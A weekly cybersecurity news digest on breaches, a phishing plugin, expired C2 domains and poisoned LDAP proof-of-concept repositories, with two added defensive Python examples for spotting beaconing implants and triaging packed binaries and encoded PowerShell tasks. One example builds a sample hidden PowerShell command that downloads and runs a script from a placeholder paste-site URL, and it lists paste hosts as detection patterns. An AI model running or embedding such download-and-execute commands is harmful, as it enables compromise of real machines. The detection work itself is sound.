Weekly News Digest 06-12 January

French tech giant Atos denies Space Bears ransomware attack claims

French technology firm Atos, which secures communications for France’s military and intelligence services, has denied claims made by the Space Bears ransomware gang that they compromised one of its databases.

Atos describes itself as Europe’s leading cybersecurity, cloud, and high-performance computing company with over 1,200 clients from 70 countries.

On December 28, Space Bears named Atos on its darknet site and threatened to publish data stolen from the company on January 8. On Friday (January 3), Atos dismissed Space Bears’ claims as “unfounded.” It added that “no infrastructure managed by Atos was breached, no source code accessed, and no Atos IP or Atos proprietary data exposed.” However, the company also said that “external third-party infrastructure, unconnected to Atos, has been compromised by the group Space Bears. This infrastructure contained data mentioning the Atos company name, but is not managed nor secured by Atos.”

The incident comes as Atos is in negotiations to sell off its advanced computing division to the French State as the company attempts to restructure amid financial woes.

CISA says U.S. Treasury only federal agency impacted by recent breach

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has said that the Treasury Department is the only federal agency impacted by a recently announced breach by state-backed hackers from China.

The Treasury Department disclosed on December 30 that Chinese government hackers breached its network after compromising a BeyondTrust instance used by the federal agency using a stolen Remote Support SaaS API key. The agency said that BeyondTrust first notified it of the breach on December 8. “Based on available indicators, the incident has been attributed to a China state-sponsored Advanced Persistent Threat (APT) actor. In accordance with Treasury policy, intrusions attributable to an APT are considered a major cybersecurity incident,” the agency said in a letter to Congress.

U.S. officials later revealed that the attackers specifically targeted the Office of Foreign Assets Control (OFAC), which administers and enforces trade and economic sanctions programs. The threat actors also breached the Treasury’s Office of Financial Research. However, officials said there was no evidence that the Chinese state hackers maintained access to the agency’s systems after shutting down the compromised BeyondTrust instance.

CISA said on Monday (January 6) that there is “no indication that any other federal agencies have been impacted” by the campaign aimed at the Treasury. “CISA continues to monitor the situation and coordinate with relevant federal authorities to ensure a comprehensive response,” the agency said. “We are working aggressively to safeguard against any further impacts and will provide updates, as appropriate.”

New PhishWP WordPress plugin helps cybercriminals go phishing

Researchers have discovered a new phishing toolkit packaged as a WordPress plugin that turns a WordPress installation into a sophisticated, feature-rich phishing site for stealing user information.

Dubbed PhishWP, the kit is designed to steal payment card information and is offered for sale on Russian underground forums. It features a rich set of functionality that ticks many boxes on a cybercriminal’s wish list. The kit’s features include the capability to generate fake checkout pages imitating many commonly used payment processors, such as Stripe. It can intercept the one-time passwords (OTPs) used in the 3-D Secure (3DS) step that many card transactions rely on for additional protection. The kit also includes a Telegram integration so that cybercriminals are notified instantly when a new transaction is in progress.

When transactions are completed, the kit can even send fake order confirmation emails to victims to make it appear as if their transactions were successful, which can help delay detection of the fraud.

The kit supports multiple languages to enable it to be targeted at victims in different regions and has a range of obfuscation options that can be employed to help maintain stealth.

Typical use of the kit could involve the cybercriminal setting up fake websites and generating traffic to them or hacking into existing websites of legitimate businesses and planting fake checkout pages on the hacked servers to capture traffic to the site.

UN aviation agency confirms recruitment database breach

The United Nations’ International Civil Aviation Organization (ICAO) has confirmed that a hacker accessed thousands of records after compromising its internal recruitment database.

Established in 1944, ICAO works with 193 countries to support the development of mutually recognized technical standards.

On Monday (January 6), ICAO announced it was investigating “reports of a potential information security incident allegedly linked to a threat actor known for targeting international organizations.” The announcement came two days after a threat actor named Natohub leaked 42,000 documents reportedly stolen from ICAO on the BreachForums hacking forum.

On Tuesday (January 7), the agency confirmed the breach, telling reporters that the “incident involves approximately 42,000 recruitment application data records from April 2016 to July 2024 claimed to be released by the threat actor known as Natohub.”

The compromised data includes job applicants’ names, email addresses, dates of birth, and employment history. “The affected data does not include financial information, passwords, passport details, or any documents uploaded by applicants,” according to ICAO. The agency added that the breach is limited to the recruitment database and that it is working to identify and notify affected individuals.

Expired domains offer cybercriminals a way to take over infected computers

Researchers have discovered that expired domains are another handy way for cybercriminals to profit from the work of others who may have previously compromised computers in an organization.

Command and control servers used in cyberattacks often use domain names that are registered by attackers for a one-off purpose, used for a short time, and then abandoned when they are no longer needed. However, domain name registrations typically expire after a year, and if they are not renewed by the original owner, they become available for another person to register.

This is exactly what the researchers did with 40 expired domains that were known to be used previously by attackers. What they found upon registering the domains and monitoring communications to them was that there were still more than 4,000 machines actively reaching out to them. Many of the machines reaching out were running various backdoors and web shells, which could be used to remotely access and control the infected machines.

Infected machines came from many different countries and organizations, including governments and academic institutions.

Disturbingly, this traffic shows that the machines have remained infected for a long time, and because the domains had lapsed, any other attacker could have re-registered them and taken control of the infected computers. To prevent this, the researchers handed control of the re-registered domains to The Shadowserver Foundation, which subsequently sinkholed them.
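The check a sinkhole operator runs after re-registering a lapsed C2 domain is to separate hosts that are still beaconing from one-off scanner noise. The following Python is an added example written for this digest, not the researchers’ or Shadowserver’s code. The log lines are constructed (vhost, client IP, ISO timestamp, request, user agent) and use documentation IP ranges and .example domains; the beacon heuristic (at least three hits whose inter-arrival times are nearly constant) is a common approach rather than the one the study used.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sinkhole access log (not real data). Format per line:
#   <vhost> <client_ip> <iso_timestamp> "<method> <path> <proto>" "<user_agent>"
SINKHOLE_LOG = """\
abandoned-c2.example 203.0.113.10 2025-01-08T10:00:00Z "GET /gate.php?id=7 HTTP/1.1" "Mozilla/4.0"
abandoned-c2.example 203.0.113.10 2025-01-08T10:05:01Z "GET /gate.php?id=7 HTTP/1.1" "Mozilla/4.0"
abandoned-c2.example 203.0.113.10 2025-01-08T10:10:00Z "GET /gate.php?id=7 HTTP/1.1" "Mozilla/4.0"
abandoned-c2.example 203.0.113.10 2025-01-08T10:14:59Z "GET /gate.php?id=7 HTTP/1.1" "Mozilla/4.0"
old-loader.example 198.51.100.7 2025-01-08T11:00:00Z "POST /update HTTP/1.1" "python-requests/2.25"
old-loader.example 198.51.100.7 2025-01-08T12:00:02Z "POST /update HTTP/1.1" "python-requests/2.25"
old-loader.example 198.51.100.7 2025-01-08T13:00:00Z "POST /update HTTP/1.1" "python-requests/2.25"
abandoned-c2.example 192.0.2.44 2025-01-08T09:13:00Z "GET / HTTP/1.1" "Mozilla/5.0 (research scanner)"
abandoned-c2.example 192.0.2.44 2025-01-08T15:47:21Z "GET /robots.txt HTTP/1.1" "Mozilla/5.0 (research scanner)"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) "(\S+) (\S+) [^"]*" "([^"]*)"$')


def parse_log(log: str):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        host, ip, ts, method, path, ua = m.groups()
        yield {
            "host": host,
            "ip": ip,
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "method": method,
            "path": path,
            "ua": ua,
        }


def find_beacons(log: str, min_hits: int = 3, max_jitter: float = 0.2) -> list[dict]:
    """Return (client, domain) pairs whose requests arrive at a near-constant interval.

    Periodic check-ins are the signature of an implant still calling home;
    a scanner or a curious analyst produces a few irregular hits instead.
    """
    by_source = defaultdict(list)
    for rec in parse_log(log):
        by_source[(rec["ip"], rec["host"])].append(rec)

    beacons = []
    for (ip, host), recs in by_source.items():
        if len(recs) < min_hits:
            continue
        recs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(recs, recs[1:])]
        mean_gap = statistics.fmean(gaps)
        # Relative jitter: standard deviation of the gaps over their mean.
        jitter = statistics.pstdev(gaps) / mean_gap if mean_gap else float("inf")
        if jitter <= max_jitter:
            beacons.append({
                "ip": ip,
                "host": host,
                "hits": len(recs),
                "interval_s": round(mean_gap),
                "path": recs[-1]["path"],
                "ua": recs[-1]["ua"],
            })
    return sorted(beacons, key=lambda b: (b["host"], b["ip"]))


if __name__ == "__main__":
    for b in find_beacons(SINKHOLE_LOG):
        print(f"{b['ip']:>15} -> {b['host']:<22} every ~{b['interval_s']}s "
              f"({b['hits']} hits) {b['path']} [{b['ua']}]")
```

The two hosts flagged are the ones a sinkhole operator would pass to the owning network for notification; the scanner at 192.0.2.44 is dropped because its two hits are neither numerous nor periodic. Tightening `max_jitter` trades missed implants that add random sleep for fewer false positives.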

Russian ISP says Ukrainian hackers “destroyed” its network

Russian internet provider Nodex revealed on Tuesday (January 7) that its network had been crippled in a cyberattack suspected to originate from Ukraine.

Nodex said the “planned” attack “destroyed” its infrastructure overnight. The St. Petersburg-based company added that it was working to restore systems from backups but did not know how long it would be before operations would resume. “Our priority is to restore telephony and the call center first,” the company stated.

According to internet monitoring service NetBlocks, Nodex’s connectivity collapsed at midnight on Tuesday, affecting both fixed-line and mobile services.

A hacker group known as the Ukrainian Cyber Alliance claimed responsibility for the attack, stating that Nodex was “completely looted and wiped, and its data exfiltrated.” The group also shared screenshots of hacked systems and data they allegedly stole.

European Commission fined for breaching its own data privacy laws

For the first time, the General Court of the European Union on Wednesday (January 8) ordered the European Commission to pay damages for breaching the EU’s own data protection rules.

The court ordered the European Union’s top executive authority to pay damages to a German citizen for transferring their personal data to the U.S. without appropriate protections, violating its own data processing rules.

The incident occurred when the German citizen signed up for a commission conference via a Facebook sign-in option on the event’s website in 2022. The citizen alleged their digital privacy rights were infringed because data about their device, browser, and IP address was sent to Amazon, the website host, and to Meta, Facebook’s parent company. The court concluded that the action constituted a “sufficiently serious breach” of the rules.

Defenders targeted with fake proof-of-concept exploits for LDAP vulnerabilities

Threat actors have once again taken to creating and spreading poisoned proof-of-concept (PoC) code to help them compromise targets.

In the latest instance, the threat actors used a recently patched Windows LDAP denial-of-service (DoS) vulnerability (CVE-2024-49113, CVSS score 7.5) as bait. Microsoft fixed it in its December 2024 Patch Tuesday release alongside a related LDAP remote code execution vulnerability (CVE-2024-49112, CVSS score 9.8).

After the patches shipped, researchers published a PoC for CVE-2024-49113 in early January 2025, and threat actors soon forked the original LDAPNightmare PoC repository. Rather than keeping a Python-based payload that would look in line with the original project, they replaced all of the Python files with a UPX-packed “poc.exe” file. The Git project also contains Korean-language elements, suggesting the origin and likely targets of the fake project.

If the intended target user downloads and runs the poc.exe file, it will result in the dropping and execution of a PowerShell script that sets up persistence for the attacker by creating a scheduled task to run another encoded script. The script then tries to pull down another script from a Pastebin link which contains instructions to collect a range of information from the compromised computer and upload it to another location for the attackers to retrieve.
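Two checks follow directly from that chain: a PoC repository whose Python sources have been swapped for a packed executable, and a scheduled task whose action is an encoded PowerShell command fetching a second stage from a paste site. The Python below is an added example for this digest, not code from the fake project or from the researchers who analysed it. It walks the PE section table to spot UPX section names and decodes a `-EncodedCommand` argument (base64 of UTF-16LE) to expose any URLs it pulls. The sample PE is built in-memory and is not a runnable program; the stager script and its pastebin.com URL are constructed placeholders, not real indicators; and the list of paste hosts beyond pastebin.com is an assumption added for breadth.

```python
import base64
import re
import struct
from typing import Optional

# Section names packers leave behind; UPX is the one the fake PoC used.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".upx"}
# pastebin.com is the host reported; the others are assumed additions.
PASTE_HOSTS = ("pastebin.com", "paste.ee", "hastebin.com")
ENCODED_CMD_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s'"()]+""")


def pe_section_names(data: bytes) -> list[str]:
    """Walk the DOS header -> PE signature -> COFF header -> section table and return section names."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_header_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_header_size  # 4-byte signature + 20-byte COFF header
    names = []
    for i in range(num_sections):  # each IMAGE_SECTION_HEADER is 40 bytes, name first
        raw = data[table + i * 40:table + i * 40 + 8]
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def looks_upx_packed(data: bytes) -> bool:
    return any(name in PACKER_SECTION_NAMES for name in pe_section_names(data))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind a PowerShell -EncodedCommand argument (base64 of UTF-16LE)."""
    m = ENCODED_CMD_RE.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def triage_task_command(cmdline: str) -> dict:
    """Decode a scheduled task's command line and flag any paste-site fetch it contains."""
    script = decode_encoded_command(cmdline)
    urls = URL_RE.findall(script) if script else []
    return {
        "encoded": script is not None,
        "script": script,
        "urls": urls,
        "paste_site_fetch": any(u.split("/")[2].lower().endswith(PASTE_HOSTS) for u in urls),
    }


def build_test_pe(section_names: list[str]) -> bytes:
    """Build a minimal, non-runnable PE32 image with the given section names (constructed sample)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE header right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0xE0, 0x102)
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, 0x10B)  # PE32 magic
    sections = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                    0x1000, 0x1000 * (i + 1), 0, 0, 0, 0, 0, 0, 0x60000020)
        for i, name in enumerate(section_names)
    )
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional) + sections


# Constructed stager modelled on the reported behaviour; the URL is a placeholder, not a real IoC.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')"
SAMPLE_TASK_CMD = ("powershell.exe -NoP -W Hidden -EncodedCommand "
                   + base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii"))

if __name__ == "__main__":
    for label, names in (("fake poc.exe", ["UPX0", "UPX1", ".rsrc"]),
                         ("normal build", [".text", ".rdata", ".data"])):
        image = build_test_pe(names)
        print(f"{label}: sections={pe_section_names(image)} upx={looks_upx_packed(image)}")
    print(triage_task_command(SAMPLE_TASK_CMD))
```

A UPX section name is not proof of malice (plenty of legitimate tools ship packed), but a "PoC" that replaces readable source with a packed binary should never be run outside an isolated VM. On a live host, the scheduled task check maps onto exporting task actions (for example with `schtasks /query /xml`) and feeding each `<Arguments>` value to `triage_task_command`.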

Palo Alto Networks patches high-severity migration tool bug

Palo Alto Networks on Wednesday (January 8) released updates to address multiple vulnerabilities in its Expedition migration tool, including a high-severity flaw that can lead to sensitive information disclosure.

The Expedition tool (previously known as Migration Tool) assists organizations when migrating from other firewall vendors to the Palo Alto Networks NGFW platform. Expedition was retired on December 31, 2024.

A high-severity SQL injection vulnerability (CVE-2025-0103 – CVSS score: 7.8) in Expedition could allow authenticated attackers to read database contents and arbitrary files. The flaw can also be exploited to “create and delete arbitrary files on the Expedition system. These files include information such as usernames, cleartext passwords, device configurations, and device API keys for firewalls running PAN-OS software,” Palo Alto Networks explained.

CVE-2025-0103 was addressed with the release of Expedition version 1.2.101, which also fixes four medium- and low-severity issues leading to JavaScript code execution, arbitrary file deletion, file enumeration, and information disclosure.

Palo Alto Networks warned Expedition users that the product will receive no additional updates or security fixes and urged customers to find alternative solutions.